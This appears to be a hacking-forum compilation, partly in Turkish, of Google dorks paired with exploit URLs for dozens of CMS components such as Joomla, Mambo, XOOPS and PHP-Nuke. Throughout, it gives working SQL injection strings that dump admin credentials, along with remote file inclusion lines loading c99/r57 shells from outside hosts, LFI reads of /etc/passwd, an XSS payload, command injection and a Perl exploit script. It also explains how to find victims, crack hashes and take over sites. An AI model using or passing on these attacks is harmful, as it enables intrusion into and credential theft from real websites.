EXPLOITS :
Http://localhost/path/123flashchat.php?e107path=Shell
AlphaContent 2.5.8 © Vulnerability
DORK 1 : inurl: "com_alphacontent"
DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"
Exploit :
index.php?option=com_alphacontent§ion=6&cat=15 &task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user() ,user(),user(),user(),user(),user(),user(),user(), user(),user(),user(),user(),user(),user(),user(),u ser(),user(),user(),user(),user(),user(),user(),us er(),user(),user(),user(),user(),user(),user(),use r(),user(),user(),user(),39/**/from/**/jos_users/*
Mambo Component (com-downloads) Vulnerability
DORK : allinurl :"com_downloads"filecatid
EXPLOIT :
index.php?option=com_downloads&Itemid=S@BUN&func=s electfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3 a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
MiniNuke 2.1 Vulnerability
DORK 1 : allinurl:"members.asp?action"
DORK 2 : allinurl: "members.asp"uid
EXPLOIT 1 :
members.asp?action=member_details&uid=-1%20union%20select%200,sifre,0,0,0,0,0,kul_adi,0,s ifre,kul_adi,sifre,1,1,1,sifre,1,1,1,isim,1,1,1,1, 1,1,1,1%20from%20members
EXPLOIT 2 :
members.asp?action=member_details&uid=-1%20union%20select%200,0,0,0,0,0,0,sifre,0,sifre,0 ,1,1,sifre,14,sifre,1,1,1,1,2,1,2,2,2,2,2,2,2,2%20 from%20members
EXPLOIT 3 :
members.asp?action=member_details&uid=-1%20union%20select%200,1,sifre,0,0,0,0,0,0,0,1,1,1 ,1,1,1,1,1,1,1,2,2,kul_adi,sifre,2,kul_adi,sifre,2 ,2,2,sifre,3,3,3,isim,3,3,3,3,3,4,4,4%20from%20mem bers
Modules-Wepchat Vulnerability
DORK : allinurl :"modules/WebChat"
EXPLOIT :
modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0,uname,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
Modules-Repice Vulnerability
DORK : allinurl :"modules/recipe"
EXPLOIT :
modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2
Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
eXV2 MyAnnonces Vulnerability
DORK : eXV2 MyAnnonces
EXPLOIT :
modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-9999999/**/union/**/select/**/pass,pass,uname,0x3a,0x3a,0x3a,0x3a,0,0,0,0x3a,0x3 a,1/**/from/**/exv2_users/*where%20exv2_admin%201
Modules-Dictionary Vulnerability
DORK 1 : allinurl: "modules/dictionary"
DORK 2 : allinurl: "modules/dictionary/print.php?id"
EXPLOIT :
modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
Applicable versions:
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
Com-Restaurante Vulnerability
DORK : allinurl: "com_restaurante"
EXPLOIT :
index.php?option=com_restaurante&task=detail&Itemi d=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,conca t(username,0x3a,password)/**/from/**/jos_users/*
Com-Accombo Vulnerability
DORK : allinurl: "com_accombo"
EXPLOIT :
index.php?option=com_accombo&func=detail&Itemid=S@ BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x 3a,password)/**/from/**/mos_users/*
Powered By Runcms Vulnerability
DORK 1 : allinurl: "modules/photo/viewcat.php?id"
DORK 2 : inurlhoto "powered by runcms"
EXPLOIT :
admin/exploit
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
pass/exploit
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Note: If we paste the admin/exploit at the end of the site URL, it returns the admin nick.
If we paste the pass/exploit, it returns the MD5 hashes.
Admin login:
http://www.bbb.net/admin
Powered By Download 3000 Vulnerability
DORK 1 : "Powered by Download 3000"
DORK 2 : allinurl: "com_d3000"
EXPLOiT :
index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*
Powered By Smoothflash Vulnerability
DORK 1 : "Powered by Smoothflash"
DORK 2 : allinurl: "admin_view_image.php"
EXPLOiT :
admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users
Com-Ahsshop Vulnerability
DORK : allinurl: "com_ahsshop"do=default
EXPLOiT 1 :
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0 x3a/**/from/**/mos_users/*
EXPLOiT 2 :
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*
Mod-Archives Vulnerability
DORK : allinurl: "index.php?mod=archives"
EXPLOiT :
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13/**/from/**/users/*
EXPLOiT 2:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10/**/from/**/users/*
EXPLOiT 3:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13,14/**/from/**/users/*
Galery-Action Vulnerability
DORK : allinurl: "index.php?mod=galerie"action=gal
EXPLOiT :
index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pa ss),4,5,6,7/**/from/**/users/*
Powered By Site Sift Vulnerability
DORK 1 : powered by Site Sift
DORK 2 : allinurl: "index php go addpage"
DORK 3 : allinurl: "index.php?go=detail id="
EXPLOiT 1:
index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16/**/from/**/admin/*
EXPLOiT 2:
index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*
Galery-Img Vulnerability
DORK : allinurl: "index.php?p=gallerypic img_id"
EXPLOiT 1:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi4_user
EXPLOiT 2:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi_user
Galid-Galeri Vulnerability
DORK : allinurl: galid "index.php?p=gallerypic"
EXPLOiT :
index.php?p=gallerypic&img_id=S@BUN&galid=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Area-Galid Vulnerability
DORK : allinurl: "index.php?area"galid
EXPLOiT :
index.php?area=1&p=gallery&action=showimages&galid =-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Shop-Categ Vulnerability
DORK : allinurl: "index php p shop"categ
EXPLOiT :
index.php?p=shop&show=showdetail&fid=S@BUN&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Showlink Vulnerability
DORK : allinurl: "index.php?showlink"links
EXPLOiT :
index.php?showlink=BGH7&fid=BGH78&p=links&area=1&c ateg=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
admin login=admin/login.php
RS MAXSOFT Vulnerability
DORK 1 : "RS MAXSOFT"
DORK 2 : "Provozováno na RS MAXSOFT"
EXPLOiT:
modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
PollBooth Vulnerability
DORK : allinurl: "pollBooth.php?op=results"pollID
EXPLOiT :
pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users
Showresult Vulnerability
DORK 1 : allinurl: "index.php?p=poll"showresult
DORK 2 : allinurl: poll_id "showresult"
EXPLOiT :
index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+ kpro_user
Fpdb/shop.mdb Vulnerability
We will search on google.com:
inurl:"mall/lobby.asp
Then append ''fpdb/shop.mdb'' (without the quotes) to the end of the site that comes up.
Example: http://www.gemdepot.com/mall/lobby.asp
http://www.gemdepot.com/fpdb/shop.mdb
A file with the .mdb extension comes up; we choose Save As and open it...
We take the hashed password from the mdb, crack it on an MD5 cracking site, log in to the site and hack it...
Xoops Vulnerability
Dork: inurl:/modules/wfsection/
Exploit:
print.php?articleid=9999999 union select 1111,2222,3333,4444,concat(char(117,115,101,114,11 0,97,109,101,58),u*****char(112,97,115,115,119,111 ,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0 from xoops_users where uid like 1/*
Com_shambo2 Vulnerability
Dork (the code we will search for on Google): "inurl:com_shambo2" (without the quotes.)
Exploit (the code we will append to the end of the site URL):
index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0% 2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F %2A%2A%2Ffrom%2F%2A%2A%2Fmos_users
PHP-Calendar Vulnerability
Search : google.com => intitle:"EasyPHPCalendar
Append to the end of the site URL (any one of these):
/calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
That's all from me. Happy hacking!
Exploide
1 http://www.target.dk/index2.php?id=-4+union+select+1,2,concat_ws(0x3a3a,brugernavn,adg angskode),4,5,6+from+web1_brugere/*
2 http://www.target.dk/index2.php?id=2&mainid=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgan gskode),3+from+web2_brugere/*
3 http://www.target.dk/index2.php?id=-3+union+select+1,concat_ws(0x3a3a,brugernavn,adgan gskode),3,4,5,6+from+web3_brugere/*
4 http://www.target.dk/index2.php?id=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgan gskode),3,4,5,6+from+web4_brugere/*
Powered By: MFH v1 Açığı
Dork: "Powered by: MFH v1"
Exploitation options:
ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+-- to get the users
ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+-- to get the admin info
ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+-- to get the ftp server info (if its configured)
W.G.C.C Açığı
Google Dork : "Web Group Communication Center"
Exploit:
XSS:
http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C
Powered By Zomplog Açığı
Dork: "powered by zomplog"
Exploit:
http://localhost/path/upload/force_download.php?file=force_download.php
Xcart Rfi Açığı
Google dork : "X-CART. Powerful PHP shopping cart software"
Exploit
site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt
Plugin-Class tabanlı Sistemlerde Açık
Google Dork: index.php?loc= veya allinurl:.br/index.php?loc=
Exploide:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
Note: 2. dorkda .br/ yazan yerin yerine saldırmak istediğiniz ülkenin uzantısını yazabilirsiniz...
Powered By Linkspile Açığı
Dork : Powered By linkspile
Exploit :
http://www.example.com/link.php?cat...,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0 x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*
The Realestate ****** Açığı
Dork : inurl:dpage.php?docID
Exploit : http://www.example.com/dpage.php?docID=-1+union+select+1,2,concat_ws(0x3a3a,Username,Passw ord)+from+admin
Calogic Calendars V1.2.2 Açığı
Dork : "CaLogic Calendars V1.2.2"
POC : http://localhost/[******_PATH]/userreg.php?langsel={SQL}
Example : http://localhost/[******_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
Powered By PHPizabi Açığı
Dork: "Powered by PHPizabi v0.848b C1 HFP1"
Exploit:
http://localhost/izabi/system/cache/pictures/id_shell.php
Example:
http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
AJ Auction 6.2.1 Açığı
DORK: inurl:"classifide_ad.php"
Exploide:
http://site.com/classifide_ad.php?i...3,4,CONCAT(user_name,char(58),password),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*
Powered By Novus Açığı
Dork: "Powered by Novus"
İnformation server:
http://[novus]/notas.asp?nota_id=1+a...t(int,db_name())
http://[novus]/notas.asp?nota_id=1+a...nt,system_user)
http://[novus]/notas.asp?nota_id=1+a...@servername)--
http://[novus]/notas.asp?nota_id=1+a...t,@@version)--
Com-Mgm Açığı
Google Dork: inurl:"com_mgm"
Exploide:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt
Com-Loudmounth Açığı
Dork: inurl:com_loudmounth
Exploid:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt
Com-Thopper Açığı
Google Dork : inurl:com_thopper veya inurlhp?option=com_thopper
Exploid:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
Com-Bsq-Sitestats Açığı
Google Dork: inurl:com_bsq_sitestats
Exploid:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt
Com-PeopleBook Açığı
Google Dork: inurl:com_peoplebook
Exploid:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt
Joomla Component AstatsPRO Açığı
Dork: allinurl: "com_astatspro"
Exploide: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
WorkingOnWeb 2.0.1400 Açığı
Dork: Powered by WorkingOnWeb 2.0.1400
Exploide:
http://localhost/events.php?idevent...at(user,0x203a3a20,password),null,0,0,0,0,0,0, 0/**/from/**/mysql.user/*
Powered by cpDynaLinks Açığı
Dork: Powered by cpDynaLinks
connecting in http://127.0.0.1/...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
if(!$ARGV[0]) {
print "\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print "
written by ka0x - ka0x01[at]gmail.com\n";
print "
usage: perl $0 [host]\n";
print "
example: http://host.com/cpDynaLinks\n";
exit(1);
}
print "\n
connecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host."/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*");
if ($go->content =~ m/____(.*?)____/ms) {
print "$1\n";
} else {
print "\n[-] exploit failed\n";
}
Gelen sayfada "kaynağı görüntüle"yiniz. İlk satırlarda admin nick vs md5 ler yer alır
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript]
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript]
Admidio 1.4.8 RFI Açığı
Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : http://demo.admidio.org/adm_program...e=../../adm_config/config.php&default_folder=
ezContents CMS Açığı
Dork: "ezContents CMS Version 2.0.0"
Exploits:
http://site.com/[patch]/showdetails.php?contentname="'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
Exploits 2:
http://site.com/[patch]/printer.php...,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
SoftbizScripts Açığı
Dork: "inurlowered by SoftbizScripts" veya "Subscribe Newsletter"
Exploit: http://www.ssss.com/hostdirectory/search_result.php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--
****** Açığıdır...
ProfileCMS v1.0 Açığı
Dork: "Powered By ProfileCMS v1.0" veya "Total Generators & Widgets"
Exploit: http://target.com/index.php?app=pro...-1 union select 1,2,concat(id,0x3a,username,0 x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20u sers/*
http://target.org/index.php?app=vid...-1 union select 1,concat(id,0x3a,username,0x3 a,password,0x3a,email),3,4,5,6%20from%20users/*
http://target.net/index.php?app=arc...-1 union select 1,concat(id,0x3a,username,0x3 a,password,0x3a,email),3,4,5,6%20from%20users/*
http://target.net/index.php?app=arc...-1 union select 1,load_file(0x2f6574632f70617 3737764),3,4,5,6%20from%20users/*
Com-Rsgallery Açığı
Dork: : "option=com_rsgallery" veya inurl:index.php?option=com_rsgallery
Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--
Admin nick vs hashları verir. Joomlada bulunan bir açıktır
Admin girişi: /administrator/
Powered By Power Editor Açığı
Dork: Powered By Power Editor
Exploid : http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir] examp: editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..
Kmitam Açığı
Dork: "inurl:/kmitam/"
Poc/Exploit: kmitaadmin/kmitam/htmlcode.php?file=http://attacker.com/evil
Yöntemi: Shell
BackLinkSpider Açığı
Dork: "Powered By BackLinkSpider" veya "inurl:backlinkspider.php"
Exploit: http://www.site.com/[backlinkspider_page_name].php?cat_id=[SQL]
http://www.site.com/[backlinkspider...-1 union select 1,2,3,4,5,6,7,8,9,0,1,version (),3,4,5,6,7,8,9,0/*
PHP-Nuke (Kose_Yazilari) Açığı
Google Arama : ''name Kose_Yazilari op viewarticle artid''
Google arama : ''name Kose_Yazilari op printpage artid''
Site sonuna : modules.php?name=""KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors
modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors
WorldTube Açığı
Google Arama: "inurl:/plugins/wordtube"
Site Sonuna : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt
Not: Html'den sonrasına kendi shell adresiniz gerekli.
Joomla" Component EventList Açığı
Google Arama : intext: Event List 0.8 Alpha by schlu.net
Site Sonuna : //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
Powered By 6rbScript Açığı
Google Arama : Powered by 6rbScript
Site Sonuna
PWD
http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--
USER
http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--
Com-Actualite Açığı
Google Arama : allinurl: "com_actualite"
Site sonuna : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*
Com-Mtree Açığı
Google Arama : inurl:"/com_mtree/"
Site sonuna : http://[target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=
Webring Component (component_dir) Açığı
Google Arama: inurl:com_webring
Site Sonuna : http://www.site.com/[path]/administ...g.docs.php?component_dir=http://evil_scripts?
Com-Lmo Açığı
Google Arama : "com_lmo"
Site Sonuna : $lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";
Com-PonyGallery Açığı
Google Arama : inurl:"index.php?option=com_ponygallery"
Site Sonuna : //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*
Com-NeoRecruit Açığı
Google Arama : inurl:index.php?option=com_NeoRecruit
Site Sonuna : //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*
Com-Rsfiles Açığı
Google Arama : inurl:"/index.php?option=com_rsfiles"
Site sonuna : //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=
Com-Nicetalk Açığı
Google Arama : inurl:index.php?option=com_nicetalk
Site sonuna : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*
Com-Joomlaradiov5
Google Arama : inurl:"com_joomlaradiov5"
Site Sonuna : www.site.com/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://scriptkiddie.com/c99haxor.txt?
Com-JoomlaFlashFun Açığı
Google Arama : "com_joomlaflashfun"
Site Sonuna : http://xxx.net/2007/administrator/c...laflashfun.php?mosConfig_live_site=[attacker]
Carousel Flash Image Açığı
Google Arama : inurl:"com_jjgallery
Site Sonuna : http://[Taget]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?
Com-Mambads Açığı
Google Arama : inurl:com_mambads
Site Sonuna :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
Kmita Tell Friend Açığı
Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/"
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil
Yöntemi: Shell
Panele yönlendirir.
View-FAQ Açığı
Dork: Google : "allinurl:viewfaqs.php?cat="
Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
Days-Booking Açığı
Dork: "allinurl:index.php?user=daysbooking"
Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det
Pn-Encyclopedia Açığı
Dork: allinurl:index.php?module=pnEncyclopedia
Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
Gamma Scripts Açığı
Dork : "BlogMe PHP created by Gamma Scripts"
Exploit : http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0 x71)--
veya
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
ASPapp KnowledgeBase Açığı
Dork 1 - content_by_cat.asp?contentid ''catid''
Dork 2 - content_by_cat.asp? ''catid''
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
EmagiC CMS.Net v4.0 Açığı
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username="'sa'--
vlBook 1.21 ****** Açığı
****** Download : http://home.vlab.info/vlbook_1.21.zip
DORK : "Powered by vlBook 1.21"
XSS Address : http://example/?l=" <******>alert('xss')</******>
LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00
PHP-Nuke Siir Açığı
DORK 1 : allinurl:"modules.php?name"print
DORK 2 : allinurl:"modules.php?name="Hikaye"
DORK 3: allinurl:"modules.php?name="Fikralar"
DORK 4: allinurl:"modules.php?name="bilgi"
EXPLOIT :
print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
Com_JoomlaFlashfun Açığı
Dork: "com_joomlaflashfun"
Example:
http://xxx.net/2007/administrator/c...joomlaflashfun.php?mosConfig_live_site=[xxxx]
Powered By The Black Lily 2007 Açığı
Dork : "Powered By The Black Lily 2007"
EXPLOIT:
http://victim.com/ar/products.php?class=-1 union select 1,2,password,4,username fro m%20admin/*
veya
http://victim.com/en/products.php?class=-1 union select 1,2,3,password,username fro m%20admin/*
JUser Joomla Component 1.0.14 Açığı
Dork: inurl:com_juser
Exploit
http://localhost/path/administrator...ctions.php?mosConfig_absolute_path=[evilcode]
Rmsoft GS 2.0 Açığı
Dork: intextowered by RMSOFT GS 2.0 veya inurl:modules/rmgs/images.php
Exploit:
modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1 ,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*
Com-Na-Xxx Açığı
DORK 1 : allinurl:"com_na_content"
DORK 2 : allinurl:"com_na_bible"
DORK 3 : allinurl:"com_na_events"
DORK 4 : allinurl:"com_na_content"
DORK 5 : allinurl:"com_na_feedback"
DORK 6 : allinurl:"com_na_mydocs"
DORK 7 : allinurl:"com_na_churchmap"
DORK 8 : allinurl:"com_na_bibleinfo"
DORK 9 : allinurl:"com_na_dbs"
DORK 10 : allinurl:"com_na_udm"
